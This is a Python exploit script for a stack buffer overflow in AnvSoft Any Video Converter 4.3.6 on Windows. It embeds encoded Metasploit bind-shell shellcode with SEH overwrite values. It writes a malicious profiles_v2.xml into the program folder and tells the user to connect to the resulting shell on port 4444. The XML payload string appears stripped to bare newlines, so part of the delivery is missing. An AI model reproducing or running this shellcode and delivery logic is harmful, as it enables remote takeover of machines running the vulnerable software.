#!/usr/bin/python # # Exploit Title: AnvSoft Any Video Converter 4.3.6 Stack Overflow # Author: cikumel (@mhx_x) and y0k (@riy0_wid) from @spentera research # Website: http://www.spentera.com # Platform: Windows # Tested on: Windows XP SP3 # Based on POC by Vulnerability-Lab (http://www.exploit-db.com/exploits/18717/) # import os,shutil,time,sys def banner(): print "\n\tAnvSoft Any Video Converter 4.3.6 Stack Overflow" print "\tbased on POC by Vulnerability-Lab (www.vulnerability-lab.com)" print "\tcikumel (@mhx_x) and y0k (@riy0_wid) from @spentera research\n" print "\t----------------------------------------------------\n" junk = "\x90" * 328 nseh = "\xeb\x06\x90\x90" seh = "\xe4\xf3\x04\x10" # win32_bind - EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com # badchars = "\x00\x0a\x0d\x22\x26\x3e" code = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x48" "\x58\x30\x41\x30\x50\x42\x6b\x42\x41\x58\x41\x42\x32\x42\x41\x32" "\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x59\x79\x69\x6c\x30" "\x6a\x78\x6b\x32\x6d\x78\x68\x4b\x49\x4b\x4f\x4b\x4f\x4b\x4f\x41" "\x70\x6c\x4b\x30\x6c\x51\x34\x66\x44\x6e\x6b\x72\x65\x35\x6c\x6c" "\x4b\x73\x4c\x67\x75\x30\x78\x67\x71\x68\x6f\x4c\x4b\x50\x4f\x47" "\x68\x4e\x6b\x41\x4f\x67\x50\x55\x51\x7a\x4b\x42\x69\x6c\x4b\x74" "\x74\x4c\x4b\x36\x61\x78\x6e\x74\x71\x4b\x70\x4f\x69\x6e\x4c\x4f" "\x74\x4b\x70\x70\x74\x65\x57\x4a\x61\x6b\x7a\x56\x6d\x47\x71\x4b" "\x72\x5a\x4b\x58\x74\x35\x6b\x72\x74\x75\x74\x34\x68\x30\x75\x4b" "\x55\x4c\x4b\x43\x6f\x57\x54\x36\x61\x68\x6b\x72\x46\x4e\x6b\x56" "\x6c\x30\x4b\x6e\x6b\x43\x6f\x65\x4c\x67\x71\x4a\x4b\x44\x43\x54" "\x6c\x4c\x4b\x6f\x79\x70\x6c\x74\x64\x35\x4c\x70\x61\x39\x53\x57" "\x41\x69\x4b\x50\x64\x6c\x4b\x47\x33\x70\x30\x6c\x4b\x57\x30\x76" "\x6c\x6c\x4b\x72\x50\x45\x4c\x6e\x4d\x4c\x4b\x53\x70\x43\x38\x63" "\x6e\x55\x38\x6c\x4e\x30\x4e\x54\x4e\x78\x6c\x42\x70\x69\x6f\x6e" "\x36\x53\x56\x63\x63\x70\x66\x33\x58\x54\x73\x36\x52\x53\x58\x61" "\x67\x34\x33\x57\x42\x41\x4f\x53\x64\x39\x6f\x5a\x70\x45\x38\x68" "\x4b\x7a\x4d\x39\x6c\x57\x4b\x66\x30\x6b\x4f\x49\x46\x63\x6f\x4b" "\x39\x79\x75\x65\x36\x4f\x71\x58\x6d\x47\x78\x63\x32\x70\x55\x73" "\x5a\x37\x72\x4b\x4f\x68\x50\x70\x68\x4e\x39\x74\x49\x4c\x35\x4c" "\x6d\x71\x47\x4b\x4f\x4a\x76\x32\x73\x63\x63\x50\x53\x50\x53\x31" "\x43\x52\x63\x73\x63\x47\x33\x33\x63\x59\x6f\x4e\x30\x31\x76\x30" "\x68\x77\x61\x51\x4c\x31\x76\x51\x43\x4d\x59\x6a\x41\x6f\x65\x45" "\x38\x4f\x54\x66\x7a\x50\x70\x6a\x67\x66\x37\x79\x6f\x6e\x36\x61" "\x7a\x64\x50\x33\x61\x42\x75\x69\x6f\x6a\x70\x33\x58\x4c\x64\x6e" "\x4d\x56\x4e\x39\x79\x73\x67\x4b\x4f\x7a\x76\x72\x73\x70\x55\x59" "\x6f\x58\x50\x61\x78\x6a\x45\x41\x59\x6d\x56\x42\x69\x66\x37\x4b" "\x4f\x4e\x36\x46\x30\x76\x34\x31\x44\x50\x55\x69\x6f\x4e\x30\x6e" "\x73\x75\x38\x6b\x57\x64\x39\x49\x56\x43\x49\x46\x37\x39\x6f\x4b" "\x66\x66\x35\x39\x6f\x68\x50\x75\x36\x62\x4a\x43\x54\x72\x46\x65" "\x38\x65\x33\x70\x6d\x4f\x79\x6b\x55\x32\x4a\x46\x30\x46\x39\x41" "\x39\x38\x4c\x4d\x59\x4d\x37\x41\x7a\x52\x64\x4f\x79\x6b\x52\x70" "\x31\x4b\x70\x4c\x33\x4f\x5a\x49\x6e\x77\x32\x76\x4d\x69\x6e\x31" "\x52\x64\x6c\x4e\x73\x4e\x6d\x43\x4a\x34\x78\x6e\x4b\x6e\x4b\x6c" "\x6b\x50\x68\x62\x52\x4b\x4e\x78\x33\x54\x56\x4b\x4f\x73\x45\x32" "\x64\x39\x6f\x38\x56\x61\x4b\x32\x77\x43\x62\x70\x51\x73\x61\x71" "\x41\x63\x5a\x44\x41\x31\x41\x43\x61\x63\x65\x56\x31\x6b\x4f\x4e" "\x30\x53\x58\x4c\x6d\x5a\x79\x54\x45\x58\x4e\x33\x63\x4b\x4f\x6b" "\x66\x50\x6a\x39\x6f\x4b\x4f\x70\x37\x4b\x4f\x38\x50\x4e\x6b\x62" "\x77\x49\x6c\x4c\x43\x49\x54\x43\x54\x69\x6f\x5a\x76\x56\x32\x79" "\x6f\x6e\x30\x50\x68\x53\x4e\x6a\x78\x7a\x42\x44\x33\x52\x73\x39" "\x6f\x4e\x36\x79\x6f\x68\x50\x48") sisa = "\x90" * (1000-len(code)) poc = "\n" poc+= "\n" poc+= "\n" poc+= "\n" poc+= "\n\n\n" file = "profiles_v2.xml" splash=os.path.abspath(file) profdir="C:\Program Files\AnvSoft\Any Video Converter Professional" writeFile = open(file, "w") if os.name == 'nt': if os.path.isdir(profdir): try: writeFile.write(poc) banner() print "[*] Creating the malicious",file time.sleep(1) print "[*] Malicious",file,"created.." writeFile.close() shutil.copy2(splash,profdir) print "[*] File",file,"has been copied to",profdir print "[*] Now open AnvSoft program and telnet to port 4444" except IOError: print "[-] Could not write to destination folder, check permission.." sys.exit() else: print "[-] Could not find installation directory, is AnvSoft Any Video Converter installed?" sys.exit() else: print "[-] Please run this script on Windows." sys.exit()